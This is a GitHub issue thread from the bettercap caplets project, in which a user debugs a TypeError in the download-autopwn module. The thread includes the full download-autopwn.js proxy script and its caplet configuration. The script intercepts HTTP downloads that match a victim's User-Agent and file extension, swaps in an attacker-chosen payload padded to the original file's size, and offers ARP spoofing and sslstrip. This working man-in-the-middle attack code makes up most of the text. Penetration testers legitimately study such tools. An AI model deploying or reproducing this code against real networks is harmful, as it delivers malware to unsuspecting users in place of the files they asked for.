search

bettercap / caplets

caplets and proxy modules.
Other
484 stars 152 forks source link

TypeError: Cannot access member 'toLowerCase' of undefined #50

Closed LuckyFishGeek closed 5 years ago

LuckyFishGeek commented 5 years ago

Description of the bug or feature request

Environment Please provide:

Bettercap version you are using ( bettercap -version ). bettercap v2.24.1 (built for linux amd64 with go1.11.6)

OS version and architecture you are using. Linux kali 5.2.0-kali2-amd64 #1 SMP Debian 5.2.9-2kali1 (2019-08-22) x86_64 GNU/Linux

Steps to Reproduce

set downloadautopwn.devices android,windows

set downloadautopwn.useragent.android Android set downloadautopwn.useragent.windows Windows|WOW64 set downloadautopwn.extensions.android apk,pdf,sh,pfx,zip set downloadautopwn.extensions.windows exe,msi,bat,jar,dll,doc,docx,swf,psd,ai,ait,pdf,rar,zip

set downloadautopwn.resizepayloads true

set http.proxy.script /usr/share/bettercap/caplets/download-autopwn/download-autopwn.js

http.proxy on

20190914_113423

buffermet commented 5 years ago

Can you please paste the contents of /usr/share/bettercap/caplets/download-autopwn/download-autopwn.js?

LuckyFishGeek commented 5 years ago

Can you please paste the contents of /usr/share/bettercap/caplets/download-autopwn/download-autopwn.js?

thank you for your help

var targets = {}

var nullbyte = "\u0000"

var green   = "\033[32m",
    boldRed = "\033[1;31m",
    onRed   = "\033[41m",
    reset   = "\033[0m",
    redLine = "\n  " + onRed + " " + reset

function onLoad() {
    devices = env["downloadautopwn.devices"].split(",")
    logStr = ""
    for (var i = 0; i < devices.length; i++) {
        item = {
            "device": devices[i],
            "useragent": env[ "downloadautopwn.useragent." + devices[i] ],
            "extensions": env[ "downloadautopwn.extensions." + devices[i] ].toLowerCase().split(",")
        }
        targets[i] = item
        logStr += "\n  " + green + targets[i]["device"] + reset +
                  "\n    User-Agent: " + targets[i]["useragent"] + 
                  "\n    Extensions: " + targets[i]["extensions"] + "\n"
    }
    log("Download Autopwn loaded.\n\nDownload Autopwn targets: \n" + logStr)
}

function onResponse(req, res) {
    // First of all check whether the requested path might have an extension (to save cpu)
    var requestedFileName = req.Path.replace(/.*\//g, "")
    if ( requestedFileName.indexOf(".") != -1 ) {
        var userAgent = req.GetHeader("User-Agent", ""),
            extension
        // Iterate through targets
        for ( var t = 0; t < Object.keys(targets).length; t++ ) {
            // Check if User-Agent is a target
            regex = new RegExp(targets[t]["useragent"])
            if ( userAgent.match(regex) ) {
                // Iterate through target extensions
                for (var e = 0; e < targets[t]["extensions"].length; e++) {
                    // Check if requested path contains a targeted extension
                    // function endsWith() could be a nice simplification here
                    if ( requestedFileName.replace(/.*\./g, "").toLowerCase() == targets[t]["extensions"][e] ) {
                        extension = targets[t]["extensions"][e]
                        // Autopwn
                        logStr = "\n" + redLine + "  Autopwning download request from " + boldRed + req.Client.IP + reset + 
                                 redLine + 
                                 redLine + "  Found " + boldRed + extension.toUpperCase() + reset + " extension in " + boldRed + req.Hostname + req.Path + reset + 
                                 redLine + 
                                 redLine + "  Grabbing " + boldRed + targets[t]["device"].toUpperCase() + reset + " payload..."
                        // Check our payload size
                        payload = readFile("/usr/share/bettercap/caplets/download-autopwn/" + targets[t]["device"] + "/payload." + extension)
                        payloadSize = payload.length
                        logStr += redLine + "  The raw size of your payload is " + boldRed + payloadSize + reset + " bytes"
                        // Append nullbytes to payload if resizing is enabled and if requested file is larger than payload
                        if ( env["downloadautopwn.resizepayloads"] == "true" ) {
                            // Check requested file size
                            requestedFile = res.ReadBody()
                            requestedFileSize = requestedFile.length
                            logStr += redLine + "  The size of the requested file is " + boldRed + requestedFileSize + reset + " bytes"
                            // Append nullbytes if required
                            if (requestedFileSize > payloadSize) {
                                logStr += redLine + "  Resizing your payload to " + boldRed + requestedFileSize + reset + " bytes..."
                                sizeDifference = requestedFileSize - payloadSize
                                nullbyteString = Array(sizeDifference + 1).join(nullbyte)
                                payload += nullbyteString
                            }
                        }
                        // Set Content-Disposition header to enforce file download instead of in-browser preview
                        res.SetHeader("Content-Disposition", "attachment; filename=\"" + requestedFileName + "\"")
                        // Update Content-Length header
                        res.SetHeader("Content-Length", payload.length)
                        logStr += redLine + 
                                  redLine + "  Serving your payload to " + boldRed + req.Client.IP + reset + "...\n"
                        log(logStr)
                        res.Body = payload
                    }
                }
            }
        }
    }
}

download-autopwn.zip

buffermet commented 5 years ago

@LuckyFishGeek I am unable to reproduce this error. Have you tried loading the module using the caplet file?

LuckyFishGeek commented 5 years ago

@LuckyFishGeek I am unable to reproduce this error. Have you tried loading the module using the caplet file?

I will try and submit the results to you. Thank you again for your help.

LuckyFishGeek commented 5 years ago

@LuckyFishGeek I am unable to reproduce this error. Have you tried loading the module using the caplet file?

Bettercap has no feedback when I download the test file (exe, zip, pdf...) 20190915_074049 20190915_074101

LuckyFishGeek commented 5 years ago

@LuckyFishGeek I am unable to reproduce this error. Have you tried loading the module using the caplet file?

my download-autopwn.cap

`# documentation can be found at https://github.com/bettercap/blob/master/download-autopwn/README.md

this module lets you intercept very specific download requests and replaces the payload with one of your choice

#

in order for a download to get intercepted:

1. the victim's user-agent string must match the downloadautopwn.useragent.x regexp value

2. the requested file must match one of the downloadautopwn.extensions.x file extensions

#

you can find the downloadautopwn.devices in the download-autopwn/ folder (you can add your own)

#

choose the devices from which downloads get pwned (enter the dir names of choice from download-autopwn/)

(or feel free to add your own)

set downloadautopwn.devices android,ios,linux,macos,ps4,windows,xbox

choose the regexp value that the victim's User-Agent has to match

(feel free to add your own)

set downloadautopwn.useragent.android Android set downloadautopwn.useragent.ios iPad|iPhone|iPod set downloadautopwn.useragent.linux Linux set downloadautopwn.useragent.macos Intel Mac OS X 10_ set downloadautopwn.useragent.ps4 PlayStation 4 set downloadautopwn.useragent.windows Windows|WOW64 set downloadautopwn.useragent.xbox Xbox

choose which file extensions get intercepted and replaced by your payload on specific devices (payloads are in download-autopwn/.../)

(again, you can add as many as you want)

make sure the payload files exist and that they are all named "payload" (for example: payload.exe)

set downloadautopwn.extensions.android apk,pdf,sh,pfx,zip set downloadautopwn.extensions.ios ipa,ios,ipb,ipsw,ipsx,ipcc,mobileconfig,pdf,zip set downloadautopwn.extensions.linux c,go,sh,py,rb,cr,pl,deb,pdf,jar,zip set downloadautopwn.extensions.macos app,dmg,doc,docx,jar,ai,ait,psd,pdf,c,go,sh,py,rb,pl,terminal,zip set downloadautopwn.extensions.ps4 disc,pup,pdf,doc,docx,zip set downloadautopwn.extensions.windows exe,msi,bat,jar,dll,doc,docx,swf,psd,ai,ait,pdf,rar,zip set downloadautopwn.extensions.xbox exe,msi,jar,pdf,doc,docx,zip

choose whether the proxy module resizes your payload to the requested file's size (if not set then default=false)

set downloadautopwn.resizepayloads true

set download-autopwn.js as proxy script

set http.proxy.script /usr/share/bettercap/caplets/download-autopwn/download-autopwn.js

uncomment if you want sslstrip enabled

set http.proxy.sslstrip true

start proxy

http.proxy on

wait for everything to start properly

sleep 1

uncomment if you want arp spoofing (make sure probing is off as it conflicts with arp spoofing)

arp.spoof on

`

buffermet commented 5 years ago

There is also no indication of any requests getting intercepted. You should first confirm whether you can proxy HTTP traffic to begin with.

buffermet commented 5 years ago

Closing because the issue with the caplet is resolved.